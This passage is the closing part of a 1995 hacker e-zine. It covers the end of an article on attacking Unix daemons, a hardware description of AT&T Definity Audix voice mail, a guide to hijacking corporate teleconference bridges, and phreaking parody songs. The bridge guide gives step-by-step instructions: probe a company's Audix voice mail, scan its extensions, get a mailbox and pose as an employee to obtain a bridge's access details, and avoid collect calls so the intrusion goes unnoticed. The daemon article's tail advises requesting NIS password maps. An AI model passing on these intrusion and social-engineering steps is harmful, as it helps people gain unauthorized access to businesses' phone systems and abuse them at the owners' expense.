- domain names are easily guessable. The most popular NIS map to request
- is passwd.byname, the NIS implementation of /etc/passwd. In addition,
- if you have access to a diskless Unix workstation, you can determine the
- NIS domain name of the server it boots from.
-
- +--------------------------------------------------------+
- + Do not confuse NIS domain names with DNS domain names! |
- +--------------------------------------------------------+
-
-
-
- --> Other attacks
-
- In addition to these daemon based attacks, many other methods can be
- used to gain access to a remote computer. These include, but are not
- limited to: default accounts, password guessing, sniffing, source
- routing, DNS routing attacks, tcp sequence prediction and uucp
- configuration exploits.
-
- This should give you an idea on how daemon based attacks function. By
- no means is this a complete list of security vulnerabilities in
- privileged internet daemons. To discover more information about how
- these daemons operate, and how to exploit their vulnerabilities, I
- highly recommend reading source code, man pages and RFC's.
-
-
- Voyager[TNO]
-
-
- <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
-
-
-
-
- [][][][][][][][][][][][][][][][][][][][][][]
- [[[ ]]]
- [[[[ THE DEFINITY AUDIX VMS INSIDE OUT ]]]]
- [[[[[ ]]]]]
- [[[[[[[ by: Boba Fett ]]]]]]]
- [[[[[[[[[[[ ]]]]]]]]]]]
- [][][][][][][][][][][][][][][][][][][][][][]
-
-
- - " What?! Another crummy file on the Audix voice mail? "
-
- Not exactly. In COTNO #1, you will find a good article on identifying and
- obtaining mailboxes on the Audix Voice Mail System (VMS). This paper will
- discuss the physical/electrical design of the Audix System and how it's
- integrated with the Definity switch. I will not discuss how to obtain
- dialups to the audix or hacking it, that's another file :). Most of the
- information and diagrams in this paper where gathered from various sources.
- Mainly, the AT&T Tech. Journal may/june 1994, and some very cooperative AT&T
- representatives. ;)
-
-
- 1) Hardware
- -----------
-
- All right, what does this baby look like? Well, all in all, it's quite simple.
- There are 4 major components, all of which can be easily replaced or removed.
- A tape drive, a hard disk and 2 circuit boards. Here's what the Definity Audix's
- front panel looks like.
-
-
- Disk/Alarm board MFB panel
-
- .---------------------.__.-----.
- | _______________ | | |
- | | | | | o <----- Red LED
- | | | | | |
- | | ||| | | | O <---------- "Enter/yes" Button
- | | ||| | | | __ |
- Tape ----->| |||| | | | || |
- Unit | | |||| | | | || |
- | | ||| | | | || <----- Alphanumeric liquid
- | | ||| | | | || | crystal display(10 character)
- | | ||| | | | -- |
- | --------------- | | O <---- "Next/no" button
- | | | |
- | | | |
- Boot/ -----------------> O | | O <---- "Back" button
- shutdown | | |Back |
- button | .--------. | | |
- | | Some | | | |
- | | stupid | _ | | _ |
- | | warning| | | | | | <-------------- Handles/
- | | label. | | | | | | | | / latch
- | |________| | <----------------
- .________________|_|__|--|_|_|_|
-
-
- As you can see, it consists of two boards: The multifunction board (right), and
- the disk/alarm board (left).
-
- o MFB major components:
-
- - A 386 processor (supports Unix System V) with 16 megs of dynamic
- RAM (DRAM).
- - An array of six 50 mhz digital signal processors (DSPs).
- - The Definity switch time-division multiplexed (TDM) bus interface.
- - An alarm monitoring processor. :(
-
- o D/ALB major components:
-
- - A tape drive
- - A Hard Drive
- - An online modem for REMOTE ALARM NOTIFICATION, AND REMOTE MAINTENANCE.
-
-
- The modem is included with the package. If the on-board modem does not
- comply with the local telco rules (for example foreign countries) , than
- through the RS-232 port an external one can be attached. Let's take a deeper
- look inside and see where the components go.
-
- .--------------------------------------.
- /| + Disk/Alarm Board + |__Tip/Ring
- .--------. / | .------------------remote acs ports--|___RS-232
- | | / | | |
- | | / | | .------|--------|--------Ethernet----- LAN
- |S | / | | | Tape System Disk controller|
- |W | / |_|__|_________________________________|
- |I |/ |-|--|---------------------------------|
- |T|======| | | | + Multifunction Board + |
- |C| Audix| | | | |
- |H|======| | | | /============== RS-232
- | |\ | | SCSI 386 Serial Data Packet |
- |________| \ | | Interface CPU async/sync. bus |--- Packet
- \ | | -|-----------|-------|------inter- | Bus
- \ | | | 16 Meg DMA face |
- \ | Faceplate RAM | \ | |
- \ | & Control | \ TDM |
- \ | 3 DSP 32Cs---Interface|--- TD bus
- \______________________________________|
-
-
- o Explanation of some terms:
-
- CPU: Central Processing Unit
- DSP: Digital Signal Processor
- TDM: Time-Division Multiplexed
- DMA: Direct Memory Access
- SCSI: Small Computer System Interface
-
- The Definity Audix VMS is so compact because it has to fit in the Definity
- PBX's port slot. It can: detect a incoming call, detect when the caller has
- disconnected, disconnect a call on ANY port. It can also, disable any port to
- prevent it from receiving incoming calls, and most important of all, it can
- originate outgoing calls. It is also good to know that it has CLID.
- Here's a list of it's functions:
-
- - Call History Information (Called Party ID,Calling party ID and
- reason for call).
- - Integrated message waiting notification (LED).
- - Disconnect message (Contact Administrator for help, please disconnect
- goodbye).
- - Message waiting status information (Updated on activity, Audit of
- each vmb and refresh of all vmbs).
- - Maintenance info. for link.
- - Audix control of port. (disconnect call, detect caller, etc..)
-
- I've been referring to it as the Definity Audix, and not just Audix. Audix,
- (aka Audix release 1), was first introduced in 1984. The Definity Audix,
- however, was introduced in 1992, and came with a series of more advanced
- features. For example, the time scale modification option was improved, allowing
- the playback of messages at slower or faster speeds. Or the speech
- encoder/decoder algorithm which was changed resulting in better sound quality
- (so they say). How can you tell if it's a Definity when calling it remotely?
- Well, quite frankly I'm not sure. There is a way, however, it isn't very easy to
- apply. The Audix, release 1 system takes approx. 1 second to detect your DTMF
- tones. Now, the Definity, on the other hand, takes only about 25 milliseconds,
- less than half the time. You can time the reaction, and figure out what your
- dealing with, but there are many things that can affect the response time also
- (for example, the amount of people using the voice mail). As you can see
- this method isn't very reliable.
-
- 2) Software
- -----------
-
- The system software resides on a single 160 meg casettee tape. It is loaded
- on the hard disk whenever an installation or upgrade is being performed.
- There is also a big part of the code, which constantly monitors multiple
- thermal sensors on the two circuit packs, making sure that they don't over
- heat.
-
- The chick's sweet voice you hear when interacting with the VMS, is composed
- of multiple fragments. A fragment can be a single word, a complete sentence,
- or a bunch of sentences. For example, "Please enter extension and pound sign"
- is most likely to be two fragments. The first being "please enter extension"
- and the second being "and pound sign". Obviously, this is used to save space.
- A second recording is: "Enter password and pound sign", the "and pound sign"
- is the same fragment as in the first one. Since AT&T sells it's Audix system
- in nearly 80 countries, there are a couple of different language tapes also.
- So don't be surprised if you encounter a Spanish or Japanese Audix VMS.
- Currently AT&T offers ten language tapes and the Definity Audix can support
- up to nine different language tapes simultaneously.
-
-
- "So if it's an Audix voice mail then there's a Definity PBX, right? "
-
- Wrong. Even though it fits the Definity PBX like a glove, it can be integrated
- with other switches. Some of the most common are:
-
- - G3I - System 25
- - G3S - System 75
- - G3R - System 85
-
- I'm not sure about NorTel switches such as the SL-1, some people say yes,
- while others say that only AT&T switches can be integrated with Audix. If
- anyone knows, please let me know. Comments or suggestions are welcome.
-
-
- - Boba Fett
-
- <EOF>
- <05/23/95>
-
-
- <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
-
-
-
-
- /\
- \/
- Bridging the Gap
- /\-------------------------/\
- \/-------------------------\/
- Eddie Van Halen
- /\
- \/
-
-
- INTRODUCTION
- ------------
- First of all I wrote this because for one thing I am SICK AND TIRED of sitting
- on irc and seeing "k0nPhiNf0!?" pumped through my terminal every five seconds.
- Then,once they get the k0nPh iNf0, I am forced to constantly hear from the
- k0nPh people about how "DiZ k0nPh sUx!". People give me k0nPh info all the
- time but I NEVER call into them. Why? Because these days,they DO suck. It
- seems the underground world have completely forgotten about what use to be
- the best way to conference - BRIDGE's.
-
-
- ABOUT BRIDGES
- -------------
- I'm sure everyone reading this knows what a bridge is. Whether they know the
- best way to get them is another thing. I do, however, run across the
- occasional irc'er that /msgs me with "whats a bridge?" when I bring up the
- subject.
-
- Bridges are just about the same as k0nPhz, except they are usually owned and
- used by big businesses and schools on their own telephone equipment. This
- equipment is usually integrated into their voice mail and/or PBX computers
- and allows the company or school to hold teleconferences without relying on
- the national teleconference providers.
-
- For those out there (if any?) that remember the 904-348 bridge, it was a
- System 75 PBX bridge used by a home school, where the students would call in
- in the daytime and take tests and attend classes. The way it was used was as
- follows:
-
- You would dial 348-XX00 to 348-XX19. That was ONE of the bridges.
- Anybody that connected to any number from 00 to 19 would be connected
- to the bridge. If two people tried to connect to the same number, it
- would be busy. Thus, it had 20 lines. A second bridge was reached at
- 348-XX20 to 348-XX29. This was off the same system, but gave you a
- different bridge with 10 lines. Yet another bridge could be found at
- 348-XX30 to 348-XX69 off the same system.
-
- You could call in during the daytime and mess with the teachers and kids or
- whatever, but occasionally they would hang you up, or call you back or
- something. This one went down because it wasn't blocked from collect calls,
- and the number got very widespread throughout the k0d3lyN3 and BBS world and
- was constantly collect-called by lamers who didn't know how to phreak. It is,
- however, occasionally up for the students to use, but goes down as soon class
- is over.
-
- FINDING A BRIDGE.
- -----------------
- Finding a bridge use to be the easiest thing for me. It used to be, like,
- WHAT I DID. I would put one up on my codeline, and spread it to the others,
- and would call into QSD or Lutz or something about 30 minutes afterward
- and get messages from people who I didn't even know saying "Hey,man,thanx
- for puttin up that bridge!". These days I don't even bother. I don't WANT
- to talk to half these idiots that are around today.
-
- Anyway, lets say you want to find a bridge. Go through the phonebook and look
- up the all the big businesses. Call the main numbers that you find after
- hours and find out which ones have voice mail systems. In this article, I
- will focus on the Audix voicemail system made by AT&T so look for those. To
- tell if your target is using Audix, press *8 during the greet, and if it says
- "Enter the four digit extension and pound sign." you have found one. A
- complete guide to hacking Audix voice mail can be found in CoTNo #1,
- article #1. Railroad companies like CSX and AT&T owned companies like
- Transtech, or Card Services often have Audix systems with bridges.
-
- Once you have the targeted Audix system,you need to start scanning for the
- system extensions. Hit *6 for the names directory and try entering
- CONFERENCE, BRIDGE, or TELE. You COULD possibly get the actual extension to
- the bridge spit out right at you (as with CSX's system),or at least most
- systems have that extension where you hear the person state their name
- "Conference Planning". If this is the case,you need to get a voice mail
- box off the system and send a message to whatever extension Conference
- Planning is saying something like "Yes, I need a conference set up for
- such and such a date & such and such a time". This will more than likely
- work and Conference Planning will respond usually with either "No problem,
- the teleconference bridge is at XXXX" or "All we need is the PIN
- number you want."
-
- However, a lot of systems do not have their *6 directory system configured
- very good at all, so you might want to try scanning all the XX00 and XX99
- and find out where all the computer-related extensions are located at.
- Or you might want to social engineer it out of one of the people located
- at an extension. Try calling from within your box and acting like you work
- there.
-
- Once you have found what you think is the bridge,you need to test it out
- with a friend. If he calls into the same extension and gets a busy signal,
- you may want tell him to try the next extension up. If the bridge is
- multi-lined, have him figure out how many lines the bridge has and make
- sure the lines are all going to the same bridge and not 3 different
- bridges or something. Note that if you are scanning on a Railroad
- companies system, you will sometimes come to an extension you might think
- is a bridge and end up to be dispatchers. So once you sign on to what you
- believe is the bridge,hit a few dtmf tones and make sure you don't hear
- someone say "You done hittin funny buttons!!!" or "dispatcher,mike."
-
- SECURITY ON A BRIDGE.
- ---------------------
- Security on a bridge is a lot different than on an alliance or on a k0nPh.
- You usually don't have to worry about it getting cancelled and the bridge
- usually will not ever go down if you don't third-party or collect call to
- it. You are not dealing with the phone company here, you are dealing
- with whatever business owns it, and if they detect a lot of activity on
- the extension, they will usually either warn you to leave by recording the
- conversations and playing them back to you, or just change the extension.
- DO expect to be dealing with the business communication security person,
- though, at one time or another. They will usually talk to you and explain to
- you why they need you to leave, and most of the time I found out, it wasn't
- because of the people using their bridge, it was because of the collect-
- calling, third party billing or the fact that people were using it via the
- 800 number and the company was having to pick up the tab. I don't recommend
- finding a bridge and giving it to the entire world because when you are
- not on, you don't know what goes on in the conversation, and if the company
- does finally decide to get it investigated, the investigators seem to go
- after the same thing every time: the source that gave out the bridge in
- the first place.
-
- CONCLUSION
- ----------
- Hopefully you have learned something from all this. With a little time and
- patience, you can set up a bridge that will last for weeks, maybe months.
- And besides, hacking out a phone system will teach you a lot more than
- than setting up a k0nPh off your neighbor's phone terminal. So next time
- you see someone flash "k0nPhiNf0!?", tell them to get off there ass and
- try hacking one out for a change.
-
-
- <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
-
-
-
-
- Elite Music Part V
- - Disk Jockey/WR -
-
-
- Please note the /WR. Until now I have not been in textfiles at large, only
- a few given to good friends. There have been other `DJ's out there; as many
- as six by my count, so far. So even that my group has had but one member
- for over four years, I keep the tag to distinguish myself.
-
- Well, while on a (pretty lame, I must admit) conference with a barrage of
- lame people, sending streams of DTMF tones, long belches, humming, and
- music down the line, I got an idea. At one point the B-52's `Roam' was
- played in the background during a half-intelligent discussion of cellular
- telecommunications. These lyrics almost came to me almost immediately, and
- these are the results. I intend to record this song for real in a few
- months or so; I do have the instrumental of the real song and it would be
- somewhat fun to do. Maybe a .AU will be out there on the Web, sometime...
- and by that time these lame people might grow up. (But, I can't ask for
- everything.)
-
- "Phone Roam"
-
- Roam cyberspace, switching through every carrier
- Oh girl won't you lend me one of those codes
- Take it trunk to trunk, hopping through the satellites
- Around the world, the call flags switchboard lights
-
- Roam if you want to, roam around the world
- Roam if you want to, without codes, without cards
- Roam if you want to, roam around the world
- Roam if you want to, without anything but an ESN
-
- Hit conferences where you'll lose your mind
- Toners and lamers, leave them all behind
- Take it trunk to trunk, hopping through the satellites
- Around the world, the call flags switchboard lights
-
- Roam if you want to, roam around the world
- Roam if you want to, without codes, without cards
- Roam if you want to, roam around the world
- Roam if you want to, without anything but an ESN
-
- Go ahead and roam, go ahead and roam
-
- Scan all you can while the Feds trace you
- Hack up PBXs till your hands get tired
- Take it trunk to trunk, hopping through the satellites
- Around the world, the call flags switchboard lights
-
- Roam if you want to, roam around the world
- Roam if you want to, without codes, without cards
- Roam if you want to, roam around the world
- Roam if you want to, without anything but an ESN
-
- Take it trunk to trunk, hopping through the satellites
- Take it trunk to trunk, hopping through the satellites
- Take it trunk to trunk, hopping through the satellites
- Take it trunk to trunk, hopping through the satellites
- Take it trunk to trunk, hopping through the satellites
- Take it trunk to trunk, hopping through the satellites
- Go ahead and roam, go ahead and roam
-
-
- <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
-
- End of CoTNo #06
-
- I know you expect some snappy ending as usual to another successful issue
- of Communications of The New Order, but considering the grimness of much
- of this issue I don't think it would be appropriate. Despite all of the
- bad news that was presented in this issue, I hope that everyone will
- "keep the faith", as it were. Explore, learn, educate. But don't do
- anything stupid. The powers that be are becoming increasingly intent
- upon stopping those who are labeled as "hackers". And everyday, there
- are more of us for them to stop. Everyday, we are being introduced to
- new technologies that few people understand, and few people want to
- understand. Our desire to understand can be achieved, but we must be
- careful.
-
- Even though you just read this issue's Elite Music, I thought I would
- finish off with another song that has special significance to me. This
- showed up in my e-mail the other day and it really made me think. I
- hope it is as meaningful to you as it was for me...
-
-
- TNO MAN
- -------
- To the Tune of Desperado, by The Eagles
-
-
- TNO man, why don't you come to your senses?
- You been out jumping' fences into those Bell yards.
- Oh you're a smart one, I know that you got your reasons,
- these things that are pleasin' can hurt you somehow.
-
- Don't you hack on those old .mil sites,
- they'll catch you if you're lazy,
- you know diverting twice is always your best bet.
- Now it seems to me some eleet things
- have been shown upon your screen
- but you only want the ones that you can't hack.
-
- TNO man, oh you ain't gettin' no younger,
- your hunger for knowledge, it's drivin' you on.
- And hacking, oh hacking, well that's just some people talkin',
- your prison is waitin' at the end of the line.
-
- Don't your power get old on the Internet?
- The account won't die and the root won't mind,
- it's hard to tell the night time from the day.
- You're losin' all your highs and lows,
- ain't it funny how the feelin' goes away?
-
- TNO man, why don't you come to your senses?
- Come down from your firewalls, open the gateway.
- It may be laming' but there's a job waiting for you.
- You better let somebody hire you LET SOMEBODY HIRE YOU
- you better let somebody hire you before it's too late.
-
- - Don Henley, Glenn Frey and the Voyager
-
-